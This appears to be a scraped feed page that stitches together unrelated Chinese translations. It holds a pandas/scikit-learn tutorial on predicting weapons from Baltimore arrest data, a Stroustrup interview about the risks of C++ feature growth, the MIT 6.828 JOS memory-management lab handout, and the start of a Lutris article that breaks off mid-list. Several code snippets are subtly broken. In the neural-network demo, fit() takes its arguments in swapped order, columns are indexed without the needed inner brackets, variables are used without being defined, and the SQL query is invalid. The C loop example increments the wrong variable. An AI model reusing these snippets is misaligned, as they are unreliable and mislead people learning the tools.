许多 Python 库都是建立在彼此之上的(称为依赖项),其基础是 NumPy 库。NumPy 专门为数据科学设计,经常被用于在其 ndarray 数据类型中存储数据集的相关部分。ndarray 是一种方便的数据类型,用于将关系表中的记录存储为 cvs 文件或其它任何格式,反之亦然。将 scikit 函数应用于多维数组时,它特别方便。SQL 非常适合查询数据库,但是对于执行复杂和资源密集型的数据科学操作,在 ndarray 中存储数据可以提高效率和速度(但请确保在处理大量数据集时有足够的 RAM)。当你使用 pandas 进行知识提取和分析时,pandas 中的 DataFrame 数据类型和 NumPy 中的 ndarray 之间的无缝转换分别为提取和计算密集型操作创建了一个强大的组合。

作为快速演示,让我们启动 Python shell 并在 pandas DataFrame 变量中加载来自巴尔的摩的犯罪统计数据的开放数据集,并查看加载的一部分 DataFrame:

>>>  import pandas as pd
>>>  crime_stats = pd.read_csv('BPD_Arrests.csv')
>>>  crime_stats.head()

我们现在可以在这个 pandas DataFrame 上执行大多数查询,就像我们可以在数据库中使用 SQL 一样。例如,要获取 Description 属性的所有唯一值,SQL 查询是:

$ SELECT unique(“Description”) from crime_stats;

利用 pandas DataFrame 编写相同的查询如下所示:

>>>  crime_stats['Description'].unique()
['COMMON   ASSAULT'   'LARCENY'   'ROBBERY   - STREET'   'AGG.   ASSAULT'
'LARCENY   FROM   AUTO'   'HOMICIDE'   'BURGLARY'   'AUTO   THEFT'
'ROBBERY   - RESIDENCE'   'ROBBERY   - COMMERCIAL'   'ROBBERY   - CARJACKING'
'ASSAULT   BY  THREAT'   'SHOOTING'   'RAPE'   'ARSON']

它返回的是一个 NumPy 数组(ndarray 类型):

>>>  type(crime_stats['Description'].unique())
<class   'numpy.ndarray'>

接下来让我们将这些数据输入神经网络,看看它能多准确地预测使用的武器类型,给出的数据包括犯罪事件,犯罪类型以及发生的地点:

>>>  from   sklearn.neural_network   import   MLPClassifier
>>>  import   numpy   as np
>>>
>>>  prediction   =  crime_stats[[‘Weapon’]]
>>>  predictors   =  crime_stats['CrimeTime',   ‘CrimeCode’,   ‘Neighborhood’]
>>>
>>>  nn_model   =  MLPClassifier(solver='lbfgs',   alpha=1e-5,   hidden_layer_sizes=(5,
2),   random_state=1)
>>>
>>>predict_weapon   =  nn_model.fit(prediction,   predictors)

现在学习模型准备就绪,我们可以执行一些测试来确定其质量和可靠性。对于初学者,让我们输入一个训练集数据(用于训练模型的原始数据集的一部分,不包括在创建模型中):

>>>  predict_weapon.predict(training_set_weapons)
array([4,   4,   4,   ..., 0,   4,   4])

如你所见,它返回一个列表,每个数字预测训练集中每个记录的武器。我们之所以看到的是数字而不是武器名称,是因为大多数分类算法都是用数字优化的。对于分类数据,有一些技术可以将属性转换为数字表示。在这种情况下,使用的技术是标签编码,使用 sklearn 预处理库中的 LabelEncoder 函数:preprocessing.LabelEncoder()。它能够对一个数据和其对应的数值表示来进行变换和逆变换。在这个例子中,我们可以使用 LabelEncoder()inverse_transform 函数来查看武器 0 和 4 是什么:

>>>  preprocessing.LabelEncoder().inverse_transform(encoded_weapons)
array(['HANDS',   'FIREARM',   'HANDS',   ..., 'FIREARM',   'FIREARM',   'FIREARM']

这很有趣,但为了了解这个模型的准确程度,我们将几个分数计算为百分比:

>>>  nn_model.score(X,   y)
0.81999999999999995

这表明我们的神经网络模型准确度约为 82%。这个结果似乎令人印象深刻,但用于不同的犯罪数据集时,检查其有效性非常重要。还有其它测试来做这个,如相关性、混淆、矩阵等。尽管我们的模型有很高的准确率,但它对于一般犯罪数据集并不是非常有用,因为这个特定数据集具有不成比例的行数,其列出 FIREARM 作为使用的武器。除非重新训练,否则我们的分类器最有可能预测 FIREARM,即使输入数据集有不同的分布。

在对数据进行分类之前清洗数据并删除异常值和畸形数据非常重要。预处理越好,我们的见解准确性就越高。此外,为模型或分类器提供过多数据(通常超过 90%)以获得更高的准确度是一个坏主意,因为它看起来准确但由于过度拟合而无效。

Jupyter notebooks 相对于命令行来说是一个很好的交互式替代品。虽然 CLI 对于大多数事情都很好,但是当你想要运行代码片段以生成可视化时,Jupyter 会很出色。它比终端更好地格式化数据。

这篇文章 列出了一些最好的机器学习免费资源,但是还有很多其它的指导和教程。根据你的兴趣和爱好,你还会发现许多开放数据集可供使用。作为起点,由 Kaggle 维护的数据集,以及在州政府网站上提供的数据集是极好的资源。


via: https://opensource.com/article/18/3/getting-started-data-science

作者:Payal Singh 译者:MjSeven 校对:wxy

本文由 LCTT 原创编译,Linux中国 荣誉推出


          对 C++ 的忧虑?C++ 创始人警告:关于 C++ 的某些未来计划十分危险      Cache   Translate Page      

今年早些时候,我们对 Bjarne Stroustrup 进行了采访。他是 C++ 语言的创始人,摩根士丹利技术部门的董事总经理,美国哥伦比亚大学计算机科学的客座教授。他写了一封信,请那些关注编程语言进展的人去“想想瓦萨号!”

这句话对于丹麦人来说,毫无疑问,很容易理解。而那些对于 17 世纪的斯堪的纳维亚历史了解不多的人,还需要详细说明一下。瓦萨号是一艘瑞典军舰,由国王 Gustavus Adolphus 定做。它是当时波罗的海国家中最强大的军舰,但在 1628 年 8 月 10 日首航没几分钟之后就沉没了。

巨大的瓦萨号有一个难以解决的设计缺陷:头重脚轻,以至于它被一阵狂风刮翻了。通过援引这艘沉船的历史,Stroustrup 警示了 C++ 所面临的风险 —— 现在越来越多的特性被添加到了 C++ 中。

我们现在已经发现了好些能导致头重脚轻的特性。Stroustrup 在他的信中引用了 43 个提议。他认为那些参与 C++ 语言 ISO 标准演进的人(即所谓的 WG21 小组)正在努力推进语言发展,但成员们的努力方向却并不一致。

在他的信中,他写道:

分开来看,许多提议都很有道理。但将它们综合到一起,这些提议是很愚蠢的,将危害 C++ 的未来。

他明确表示,他用瓦萨号作为比喻并不是说他认为不断提升会带来毁灭。我们应该吸取瓦萨号的教训,构建一个坚实的基础,从错误中学习并对新版本做彻底的测试。

在瑞士拉普斯威尔Rapperswill召开 C++ 标准化委员会会议之后,本月早些时候,Stroustrup 接受了 The Register 的采访,回答了有关 C++ 语言下一步发展方向的几个问题。(最新版是去年刚发布的 C++17;下一个版本是 C++20,预计于 2020 年发布。)

Register:在您的信件《想想瓦萨号!》中,您写道:

在 C++11 开始的基础建设尚未完成,而 C++17 基本没有在使基础更加稳固、规范和完整方面做出改善。相反,却增加了重要接口的复杂度(原文为 surface complexity,直译“表面复杂度”),让人们需要学习的特性数量越来越多。C++ 可能在这种不成熟的提议的重压之下崩溃。我们不应该花费大量的时间为专家级用户们(比如我们自己)去创建越来越复杂的东西。(还要考虑普通用户的学习曲线,越复杂的东西越不易普及。)

对新人来说,C++ 过难了吗?如果是这样,您认为怎样的特性让新人更易理解?

Stroustrup:C++ 的有些东西对于新人来说确实很具有挑战性。

另一方面而言,C++ 中有些东西对于新人来说,比起 C 或上世纪九十年代的 C++ 更容易理解了。而难点是让大型社区专注于这些部分,并且帮助新手和非专业的 C++ 用户去规避那些对高级库实现提供支持的部分。

我建议使用 C++ 核心准则作为实现上述目标的一个辅助。

此外,我的“C++ 教程”也可以帮助人们在使用现代 C++ 时走上正确的方向,而不会迷失在自上世纪九十年代以来的复杂性中,或困惑于只有专家级用户才能理解的东西中。这本即将出版的第二版的“C++ 教程”涵盖了 C++17 和部分 C++20 的内容。

我和其他人给没有编程经验的大一新生教过 C++,只要你不去深入编程语言的每个晦涩难懂的角落,把注意力集中到 C++ 中最主流的部分,就可以在三个月内学会 C++。

“让简单的东西保持简单”是我长期追求的目标。比如 C++11 的 range-for 循环:

for (int& x : v) ++x; // increment each element of the container v

v 的位置可以是任何容器。在 C 和 C 风格的 C++ 中,它可能看起来是这样:

for (int i=0; i<MAX; i++) ++v; // increment each element of the array v

一些人抱怨说添加了 range-for 循环让 C++ 变得更复杂了,很显然,他们是正确的,因为它添加了一个新特性。但它却让 C++ 用起来更简单,而且同时它还消除了使用传统 for 循环时会出现的一些常见错误。

另一个例子是 C++11 的标准线程库standard thread library。它比起使用 POSIX 或直接使用 Windows 的 C API 来说更简单,并且更不易出错。

Register:您如何看待 C++ 现在的状况?

Stroustrup:C++11 中作出了许多重大改进,并且我们在 C++14 上全面完成了改进工作。C++17 添加了相当多的新特性,但是没有提供对新技术的很多支持。C++20 目前看上去可能会成为一个重大改进版。编译器的状况非常好,标准库实现得也很优秀,非常接近最新的标准。C++17 现在已经可以使用,对于工具的支持正在逐步推进。已经有了许多第三方的库和好些新工具。然而,不幸的是,这些东西不太好找到。

我在《想想瓦萨号!》一文中所表达的担忧与标准化过程有关,对新东西的过度热情与完美主义的组合推迟了重大改进。“追求完美往往事与愿违”。在六月份拉普斯威尔的会议上有 160 人参与;在这样一个数量庞大且多样化的人群中很难取得一致意见。专家们也本来就有只为自己设计语言的倾向,这让他们不会时常在设计时考虑整个社区的需求。

Register:C++ 是否有一个理想的状态,或者与之相反,您只是为了程序员们的期望而努力,随时适应并且努力满足程序员们的需要?

Stroustrup:二者都有。我很乐意看到 C++ 支持彻底保证类型安全type-safe资源安全resource-safe的编程方式。这不应该通过限制适用性或增加性能损耗来实现,而是应该通过改进的表达能力和更好的性能来实现。通过让程序员使用更好的(和更易用的)语言工具可以达到这个目标,我们可以做到的。

终极目标不会马上实现,也不会单靠语言设计来实现。为了实现这一目标,我们需要改进语言特性、提供更好的库和静态分析,并且设立提升编程效率的规则。C++ 核心准则是我为了提升 C++ 代码质量而实行的广泛而长期的计划的一部分。

Register:目前 C++ 是否面临着可以预见的风险?如果有,它是以什么形式出现的?(如,迭代过于缓慢,新兴低级语言,等等……据您的观点来看,似乎是提出的提议过多。)

Stroustrup:就是这样。今年我们已经收到了 400 篇文章。当然了,它们并不都是新提议。许多提议都与规范语言和标准库这一必需而乏味的工作相关,但是量大到难以管理。你可以在 WG21 网站上找到所有这些文章。

我写了《想想瓦萨号!》这封信作为一个呼吁,因为这种为了解决即刻需求(或者赶时髦)而不断增添语言特性,却对巩固语言基础(比如,改善静态类型系统static type system)不管不问的倾向让我感到震惊。增加的任何新东西,无论它多小都会产生成本,比如实现、学习、工具升级。重大的特性改变能够改变我们对编程的想法,而它们才是我们必须关注的东西。

委员会已经设立了一个“指导小组”,这个小组由在语言、标准库、实现、以及工程实践领域中拥有不错履历的人组成。我是其中的成员之一。我们负责为重点领域写一些关于发展方向、设计理念和建议重点发展领域的东西

对于 C++20,我们建议去关注:

  • 概念
  • 模块(适度地模块化并带来编译时的显著改进)
  • Ranges(包括一些无限序列的扩展)
  • 标准库中的网络概念

在拉普斯威尔会议之后,这些都有了实现的机会,虽然模块和网络化都不是会议的重点讨论对象。我是一个乐观主义者,并且委员会的成员们都非常努力。

我并不担心其它语言或新语言会取代它。我喜欢编程语言。如果一门新的语言提供了独一无二的、非常有用的东西,那它就是我们的榜样,我们可以向它学习。当然,每门语言本身都有一些问题。C++ 的许多问题都与它广泛的应用领域、大量的使用人群和过度的热情有关。大多数语言的社区都会有这样的问题。

Register:关于 C++ 您是否重新考虑过任何架构方面的决策?

Stroustrup:当我着手规划新版本时,我经常反思原来的决策和设计。关于这些,可以看我的《编程的历史》论文第 12 部分。

并没有让我觉得很后悔的重大决策。如果我必须重新做一次,我觉得和以前做的不会有太大的不同。

与以前一样,能够直接处理硬件加上零开销的抽象是设计的指导思想。使用构造函数constructor析构函数destructor去处理资源是关键(资源获取即初始化Resource Acquisition Is Initialization,RAII);标准模板库Standard Template Library(STL) 就是解释 C++ 库能够做什么的一个很好的例子。

Register:在 2011 年被采纳的每三年发布一个新版本的节奏是否仍然有效?我之所以这样问是因为 Java 已经决定更快地迭代。

Stroustrup:我认为 C++20 将会按时发布(就像 C++14 和 C++17 那样),并且主流的编译器也会立即采用它。我也希望 C++20 基于 C++17 能有重大的改进。

对于其它语言如何管理它们的版本,我并不十分关心。C++ 是由一个遵循 ISO 规则的委员会来管理的,而不是由某个大公司或某种“终生的仁慈独裁者Beneficial Dictator Of Life(BDOL)”来管理。这一点不会改变。C++ 每三年发布一次的周期在 ISO 标准中是一个引人注目的创举。通常而言,周期应该是 5 或 10 年。

Register:在您的信中您写道:

我们需要一个能够被“普通程序员”使用的,条理还算清楚的编程语言。他们主要关心的是,能否按时高质量地交付他们的应用程序。

改进语言能够解决这个问题吗?或者,我们还需要更容易获得的工具和教育支持?

Stroustrup:我尽力宣传我关于 C++ 的实质和使用方式的理念,并且我鼓励其他人也和我采取相同的行动。

特别是,我鼓励讲师和作者们向 C++ 程序员们提出有用的建议,而不是去示范复杂的示例和技术来展示他们自己有多高明。我在 2017 年的 CppCon 大会上的演讲主题就是“学习和传授 C++”,并且也指出,我们需要更好的工具。

我在演讲中提到了构建技术支持和包管理器,这些历来都是 C++ 的弱项。标准化委员会现在有一个工具研究小组,或许不久的将来也会组建一个教育研究小组。

C++ 的社区以前是十分无组织性的,但是在过去的五年里,为了满足社区对新闻和技术支持的需要,出现了很多集会和博客。CppCon、isocpp.org、以及 Meeting++ 就是一些例子。

在一个庞大的委员会中做语言标准设计是很困难的。但是,对于所有的大型项目来说,委员会又是必不可少的。我很忧虑,但是关注它们并且面对问题是成功的必要条件。

Register:您如何看待 C++ 社区的流程?在沟通和决策方面你希望看到哪些变化?

Stroustrup:C++ 并没有企业管理一般的“社区流程”;它所遵循的是 ISO 标准流程。我们不能对 ISO 的条例做大的改变。理想的情况是,我们设立一个小型的、全职的“秘书处”来做最终决策和方向管理,但这种理想情况是不会出现的。相反,我们有成百上千的人在线讨论,大约有 160 人在技术问题上进行投票,大约有 70 组织和 11 个国家的人在最终提议上正式投票。这样很混乱,但是有些时候它的确能发挥作用。

Register:在最后,您认为那些即将推出的 C++ 特性中,对 C++ 用户最有帮助的是哪些?

Stroustrup:

  • 那些能让编程显著变简单的概念。
  • 并行算法Parallel algorithms —— 如果要使用现代硬件的并发特性的话,这方法再简单不过了。
  • 协程Coroutines,如果委员会能够确定在 C++20 上推出。
  • 改进了组织源代码方式的,并且大幅改善了编译时间的模块。我希望能有这样的模块,但是还没办法确定我们能不能在 C++20 上推出。
  • 一个标准的网络库,但是还没办法确定我们能否在 C++20 上推出。

此外:

  • Contracts(运行时检查的先决条件、后置条件、和断言)可能对许多人都非常重要。
  • date 和 time-zone 支持库可能对许多人(行业)非常重要。

Register:您还有想对读者们说的话吗?

Stroustrup:如果 C++ 标准化委员会能够专注于重大问题,去解决重大问题,那么 C++20 将会非常优秀。但是在 C++20 推出之前,我们还有 C++17;无论如何,它仍然远超许多人对 C++ 的旧印象。®


via: https://www.theregister.co.uk/2018/06/18/bjarne_stroustrup_c_plus_plus/

作者:Thomas Claburn 选题:lujun9972 译者:qhwdw 校对:thecyanbirdNorthurlandpityonline

本文由 LCTT 原创编译,Linux中国 荣誉推出


          Caffeinated 6.828:实验 2:内存管理      Cache   Translate Page      

简介

在本实验中,你将为你的操作系统写内存管理方面的代码。内存管理由两部分组成。

第一部分是内核的物理内存分配器,内核通过它来分配内存,以及在不需要时释放所分配的内存。分配器以page为单位分配内存,每个页的大小为 4096 字节。你的任务是去维护那个数据结构,它负责记录物理页的分配和释放,以及每个分配的页有多少进程共享它。本实验中你将要写出分配和释放内存页的全套代码。

第二个部分是虚拟内存的管理,它负责由内核和用户软件使用的虚拟内存地址到物理内存地址之间的映射。当使用内存时,x86 架构的硬件是由内存管理单元(MMU)负责执行映射操作来查阅一组页表。接下来你将要修改 JOS,以根据我们提供的特定指令去设置 MMU 的页表。

预备知识

在本实验及后面的实验中,你将逐步构建你的内核。我们将会为你提供一些附加的资源。使用 Git 去获取这些资源、提交自实验 1 以来的改变(如有需要的话)、获取课程仓库的最新版本、以及在我们的实验 2 (origin/lab2)的基础上创建一个称为 lab2 的本地分支:

athena% cd ~/6.828/lab
athena% add git
athena% git pull
Already up-to-date.
athena% git checkout -b lab2 origin/lab2
Branch lab2 set up to track remote branch refs/remotes/origin/lab2.
Switched to a new branch "lab2"
athena%

上面的 git checkout -b 命令其实做了两件事情:首先它创建了一个本地分支 lab2,它跟踪给我们提供课程内容的远程分支 origin/lab2 ,第二件事情是,它改变你的 lab 目录的内容以反映 lab2 分支上存储的文件的变化。Git 允许你在已存在的两个分支之间使用 git checkout *branch-name* 命令去切换,但是在你切换到另一个分支之前,你应该去提交那个分支上你做的任何有意义的变更。

现在,你需要将你在 lab1 分支中的改变合并到 lab2 分支中,命令如下:

athena% git merge lab1
Merge made by recursive.
 kern/kdebug.c  |   11 +++++++++-- 
 kern/monitor.c |   19 +++++++++++++++++++
 lib/printfmt.c |    7 +++----
 3 files changed, 31 insertions(+), 6 deletions(-)
athena%

在一些案例中,Git 或许并不知道如何将你的更改与新的实验任务合并(例如,你在第二个实验任务中变更了一些代码的修改)。在那种情况下,你使用 git 命令去合并,它会告诉你哪个文件发生了冲突,你必须首先去解决冲突(通过编辑冲突的文件),然后使用 git commit -a 去重新提交文件。

实验 2 包含如下的新源代码,后面你将逐个了解它们:

  • inc/memlayout.h
  • kern/pmap.c
  • kern/pmap.h
  • kern/kclock.h
  • kern/kclock.c

memlayout.h 描述虚拟地址空间的布局,这个虚拟地址空间是通过修改 pmap.cmemlayout.hpmap.h 所定义的 PageInfo 数据结构来实现的,这个数据结构用于跟踪物理内存页面是否被释放。kclock.ckclock.h 维护 PC 上基于电池的时钟和 CMOS RAM 硬件,在此,BIOS 中记录了 PC 上安装的物理内存数量,以及其它的一些信息。在 pmap.c 中的代码需要去读取这个设备硬件,以算出在这个设备上安装了多少物理内存,但这部分代码已经为你完成了:你不需要知道 CMOS 硬件工作原理的细节。

特别需要注意的是 memlayout.hpmap.h,因为本实验需要你去使用和理解的大部分内容都包含在这两个文件中。你或许还需要去看看 inc/mmu.h 这个文件,因为它也包含了本实验中用到的许多定义。

开始本实验之前,记得去添加 exokernel 以获取 QEMU 的 6.828 版本。

实验过程

在你准备进行实验和写代码之前,先添加你的 answers-lab2.txt 文件到 Git 仓库,提交你的改变然后去运行 make handin

athena% git add answers-lab2.txt
athena% git commit -am "my answer to lab2"
[lab2 a823de9] my answer to lab2 4 files changed, 87 insertions(+), 10 deletions(-)
athena% make handin

正如前面所说的,我们将使用一个评级程序来分级你的解决方案,你可以在 lab 目录下运行 make grade,使用评级程序来测试你的内核。为了完成你的实验,你可以改变任何你需要的内核源代码和头文件。但毫无疑问的是,你不能以任何形式去改变或破坏评级代码。

第 1 部分:物理页面管理

操作系统必须跟踪物理内存页是否使用的状态。JOS 以“页”为最小粒度来管理 PC 的物理内存,以便于它使用 MMU 去映射和保护每个已分配的内存片段。

现在,你将要写内存的物理页分配器的代码。它将使用 struct PageInfo 对象的链表来保持对物理页的状态跟踪,每个对象都对应到一个物理内存页。在你能够编写剩下的虚拟内存实现代码之前,你需要先编写物理内存页面分配器,因为你的页表管理代码将需要去分配物理内存来存储页表。

练习 1

在文件 kern/pmap.c 中,你需要去实现以下函数的代码(或许要按给定的顺序来实现)。

  • boot_alloc()
  • mem_init()(只要能够调用 check_page_free_list() 即可)
  • page_init()
  • page_alloc()
  • page_free()

check_page_free_list()check_page_alloc() 可以测试你的物理内存页分配器。你将需要引导 JOS 然后去看一下 check_page_alloc() 是否报告成功即可。如果没有报告成功,修复你的代码直到成功为止。你可以添加你自己的 assert() 以帮助你去验证是否符合你的预期。

本实验以及所有的 6.828 实验中,将要求你做一些检测工作,以便于你搞清楚它们是否按你的预期来工作。这个任务不需要详细描述你添加到 JOS 中的代码的细节。查找 JOS 源代码中你需要去修改的那部分的注释;这些注释中经常包含有技术规范和提示信息。你也可能需要去查阅 JOS 和 Intel 的技术手册、以及你的 6.004 或 6.033 课程笔记的相关部分。

第 2 部分:虚拟内存

在你开始动手之前,需要先熟悉 x86 内存管理架构的保护模式:即分段和页面转换。

练习 2

如果你对 x86 的保护模式还不熟悉,可以查看 Intel 80386 参考手册的第 5 章和第 6 章。阅读这些章节(5.2 和 6.4)中关于页面转换和基于页面的保护。我们建议你也去了解关于段的章节;在虚拟内存和保护模式中,JOS 使用了分页、段转换、以及在 x86 上不能禁用的基于段的保护,因此你需要去理解这些基础知识。

虚拟地址、线性地址和物理地址

在 x86 的专用术语中,一个虚拟地址virtual address是由一个段选择器和在段中的偏移量组成。一个线性地址linear address是在页面转换之前、段转换之后得到的一个地址。一个物理地址physical address是段和页面转换之后得到的最终地址,它最终将进入你的物理内存中的硬件总线。

一个 C 指针是虚拟地址的“偏移量”部分。在 boot/boot.S 中我们安装了一个全局描述符表Global Descriptor Table(GDT),它通过设置所有的段基址为 0,并且限制为 0xffffffff 来有效地禁用段转换。因此“段选择器”并不会生效,而线性地址总是等于虚拟地址的偏移量。在实验 3 中,为了设置权限级别,我们将与段有更多的交互。但是对于内存转换,我们将在整个 JOS 实验中忽略段,只专注于页转换。

回顾实验 1 中的第 3 部分,我们安装了一个简单的页表,这样内核就可以在 0xf0100000 链接的地址上运行,尽管它实际上是加载在 0x00100000 处的 ROM BIOS 的物理内存上。这个页表仅映射了 4MB 的内存。在实验中,你将要为 JOS 去设置虚拟内存布局,我们将从虚拟地址 0xf0000000 处开始扩展它,以映射物理内存的前 256MB,并映射许多其它区域的虚拟内存。

练习 3

虽然 GDB 能够通过虚拟地址访问 QEMU 的内存,它经常用于在配置虚拟内存期间检查物理内存。在实验工具指南中复习 QEMU 的监视器命令,尤其是 xp 命令,它可以让你去检查物理内存。要访问 QEMU 监视器,可以在终端中按 Ctrl-a c(相同的绑定返回到串行控制台)。

使用 QEMU 监视器的 xp 命令和 GDB 的 x 命令去检查相应的物理内存和虚拟内存,以确保你看到的是相同的数据。

我们的打过补丁的 QEMU 版本提供一个非常有用的 info pg 命令:它可以展示当前页表的一个具体描述,包括所有已映射的内存范围、权限、以及标志。原本的 QEMU 也提供一个 info mem 命令用于去展示一个概要信息,这个信息包含了已映射的虚拟内存范围和使用了什么权限。

在 CPU 上运行的代码,一旦处于保护模式(这是在 boot/boot.S 中所做的第一件事情)中,是没有办法去直接使用一个线性地址或物理地址的。所有的内存引用都被解释为虚拟地址,然后由 MMU 来转换,这意味着在 C 语言中的指针都是虚拟地址。

例如在物理内存分配器中,JOS 内存经常需要在不反向引用的情况下,去维护作为地址的一个很难懂的值或一个整数。有时它们是虚拟地址,而有时是物理地址。为便于在代码中证明,JOS 源文件中将它们区分为两种:类型 uintptr_t 表示一个难懂的虚拟地址,而类型 physaddr_trepresents 表示物理地址。这些类型其实不过是 32 位整数(uint32_t)的同义词,因此编译器不会阻止你将一个类型的数据指派为另一个类型!因为它们都是整数(而不是指针)类型,如果你想去反向引用它们,编译器将报错。

JOS 内核能够通过将它转换为指针类型的方式来反向引用一个 uintptr_t 类型。相反,内核不能反向引用一个物理地址,因为这是由 MMU 来转换所有的内存引用。如果你转换一个 physaddr_t 为一个指针类型,并反向引用它,你或许能够加载和存储最终结果地址(硬件将它解释为一个虚拟地址),但你并不会取得你想要的内存位置。

总结如下:

C 类型 地址类型
T* 虚拟
uintptr_t 虚拟
physaddr_t 物理

问题:

  1. 假设下面的 JOS 内核代码是正确的,那么变量 x 应该是什么类型?uintptr_t 还是 physaddr_t

JOS 内核有时需要去读取或修改它只知道其物理地址的内存。例如,添加一个映射到页表,可以要求分配物理内存去存储一个页目录,然后去初始化它们。然而,内核也和其它的软件一样,并不能跳过虚拟地址转换,内核并不能直接加载和存储物理地址。一个原因是 JOS 将重映射从虚拟地址 0xf0000000 处的物理地址 0 开始的所有的物理地址,以帮助内核去读取和写入它知道物理地址的内存。为转换一个物理地址为一个内核能够真正进行读写操作的虚拟地址,内核必须添加 0xf0000000 到物理地址以找到在重映射区域中相应的虚拟地址。你应该使用 KADDR(pa) 去做那个添加操作。

JOS 内核有时也需要能够通过给定的内核数据结构中存储的虚拟地址找到内存中的物理地址。内核全局变量和通过 boot_alloc() 分配的内存是在内核所加载的区域中,从 0xf0000000 处开始的这个所有物理内存映射的区域。因此,要转换这些区域中一个虚拟地址为物理地址时,内核能够只是简单地减去 0xf0000000 即可得到物理地址。你应该使用 PADDR(va) 去做那个减法操作。

引用计数

在以后的实验中,你将会经常遇到多个虚拟地址(或多个环境下的地址空间中)同时映射到相同的物理页面上。你将在 struct PageInfo 数据结构中的 pp_ref 字段来记录一个每个物理页面的引用计数器。如果一个物理页面的这个计数器为 0,表示这个页面已经被释放,因为它不再被使用了。一般情况下,这个计数器应该等于所有页表中物理页面出现在 UTOP 之下的次数(UTOP 之上的映射大都是在引导时由内核设置的,并且它从不会被释放,因此不需要引用计数器)。我们也使用它去跟踪放到页目录页的指针数量,反过来就是,页目录到页表页的引用数量。

使用 page_alloc 时要注意。它返回的页面引用计数总是为 0,因此,一旦对返回页做了一些操作(比如将它插入到页表),pp_ref 就应该增加。有时这需要通过其它函数(比如,page_instert)来处理,而有时这个函数是直接调用 page_alloc 来做的。

页表管理

现在,你将写一套管理页表的代码:去插入和删除线性地址到物理地址的映射表,并且在需要的时候去创建页表。

练习 4

在文件 kern/pmap.c 中,你必须去实现下列函数的代码。

  • pgdir_walk()
  • bootmapregion()
  • page_lookup()
  • page_remove()
  • page_insert()

check_page(),调用自 mem_init(),测试你的页表管理函数。在进行下一步流程之前你应该确保它成功运行。

第 3 部分:内核地址空间

JOS 分割处理器的 32 位线性地址空间为两部分:用户环境(进程),(我们将在实验 3 中开始加载和运行),它将控制其上的布局和低位部分的内容;而内核总是维护对高位部分的完全控制。分割线的定义是在 inc/memlayout.h 中通过符号 ULIM 来划分的,它为内核保留了大约 256MB 的虚拟地址空间。这就解释了为什么我们要在实验 1 中给内核这样的一个高位链接地址的原因:如是不这样做的话,内核的虚拟地址空间将没有足够的空间去同时映射到下面的用户空间中。

你可以在 inc/memlayout.h 中找到一个图表,它有助于你去理解 JOS 内存布局,这在本实验和后面的实验中都会用到。

权限和故障隔离

由于内核和用户的内存都存在于它们各自环境的地址空间中,因此我们需要在 x86 的页表中使用权限位去允许用户代码只能访问用户所属地址空间的部分。否则,用户代码中的 bug 可能会覆写内核数据,导致系统崩溃或者发生各种莫名其妙的的故障;用户代码也可能会偷窥其它环境的私有数据。

对于 ULIM 以上部分的内存,用户环境没有任何权限,只有内核才可以读取和写入这部分内存。对于 [UTOP,ULIM] 地址范围,内核和用户都有相同的权限:它们可以读取但不能写入这个地址范围。这个地址范围是用于向用户环境暴露某些只读的内核数据结构。最后,低于 UTOP 的地址空间是为用户环境所使用的;用户环境将为访问这些内核设置权限。

初始化内核地址空间

现在,你将去配置 UTOP 以上的地址空间:内核部分的地址空间。inc/memlayout.h 中展示了你将要使用的布局。我将使用函数去写相关的线性地址到物理地址的映射配置。

练习 5

完成调用 check_page() 之后在 mem_init() 中缺失的代码。

现在,你的代码应该通过了 check_kern_pgdir()check_page_installed_pgdir() 的检查。

问题:

​ 1、在这个时刻,页目录中的条目(行)是什么?它们映射的址址是什么?以及它们映射到哪里了?换句话说就是,尽可能多地填写这个表:

条目 虚拟地址基址 指向(逻辑上):
1023 ? 物理内存顶部 4MB 的页表
1022 ? ?
. ? ?
. ? ?
. ? ?
2 0x00800000 ?
1 0x00400000 ?
0 0x00000000 [参见下一问题]

​ 2、(来自课程 3) 我们将内核和用户环境放在相同的地址空间中。为什么用户程序不能去读取和写入内核的内存?有什么特殊机制保护内核内存?

​ 3、这个操作系统能够支持的最大的物理内存数量是多少?为什么?

​ 4、如果我们真的拥有最大数量的物理内存,有多少空间的开销用于管理内存?这个开销可以减少吗?

​ 5、复习在 kern/entry.Skern/entrypgdir.c 中的页表设置。一旦我们打开分页,EIP 仍是一个很小的数字(稍大于 1MB)。在什么情况下,我们转而去运行在 KERNBASE 之上的一个 EIP?当我们启用分页并开始在 KERNBASE 之上运行一个 EIP 时,是什么让我们能够一个很低的 EIP 上持续运行?为什么这种转变是必需的?

地址空间布局的其它选择

在 JOS 中我们使用的地址空间布局并不是我们唯一的选择。一个操作系统可以在低位的线性地址上映射内核,而为用户进程保留线性地址的高位部分。然而,x86 内核一般并不采用这种方法,因为 x86 向后兼容模式之一(被称为“虚拟 8086 模式”)“不可改变地”在处理器使用线性地址空间的最下面部分,所以,如果内核被映射到这里是根本无法使用的。

虽然很困难,但是设计这样的内核是有这种可能的,即:不为处理器自身保留任何固定的线性地址或虚拟地址空间,而有效地允许用户级进程不受限制地使用整个 4GB 的虚拟地址空间 —— 同时还要在这些进程之间充分保护内核以及不同的进程之间相互受保护!

将内核的内存分配系统进行概括类推,以支持二次幂为单位的各种页大小,从 4KB 到一些你选择的合理的最大值。你务必要有一些方法,将较大的分配单位按需分割为一些较小的单位,以及在需要时,将多个较小的分配单位合并为一个较大的分配单位。想一想在这样的一个系统中可能会出现些什么样的问题。

这个实验做完了。确保你通过了所有的等级测试,并记得在 answers-lab2.txt 中写下你对上述问题的答案。提交你的改变(包括添加 answers-lab2.txt 文件),并在 lab 目录下输入 make handin 去提交你的实验。


via: https://sipb.mit.edu/iap/6.828/lab/lab2/

作者:Mit 译者:qhwdw 校对:wxy

本文由 LCTT 原创编译,Linux中国 荣誉推出


          在 Linux 上使用 Lutries 管理你的游戏      Cache   Translate Page      

今天我们要讨论的是 Lutris,一个 Linux 上的开源游戏平台。你可以使用 Lutries 安装、移除、配置、启动和管理你的游戏。它可以在一个单一界面中帮你管理你的 Linux 游戏、Windows 游戏、仿真控制台游戏和浏览器游戏。它还包含社区编写的安装脚本,使得游戏的安装过程更加简单。

Lutries 自动安装(或者你可以单击点击安装)了超过 20 个模拟器,它提供了从七十年代到现在的大多数游戏系统。目前支持的游戏系统如下:

  • Linux 原生
  • Windows
  • Steam (Linux 和 Windows)
  • MS-DOS
  • 街机
  • Amiga 电脑
  • Atari 8 和 16 位计算机和控制器
  • 浏览器 (Flash 或者 HTML5 游戏)
  • Commmodore 8 位计算机
  • 基于 SCUMM 的游戏和其他点击式冒险游戏
  • Magnavox Odyssey²、Videopac+
  • Mattel Intellivision
  • NEC PC-Engine Turbographx 16、Supergraphx、PC-FX
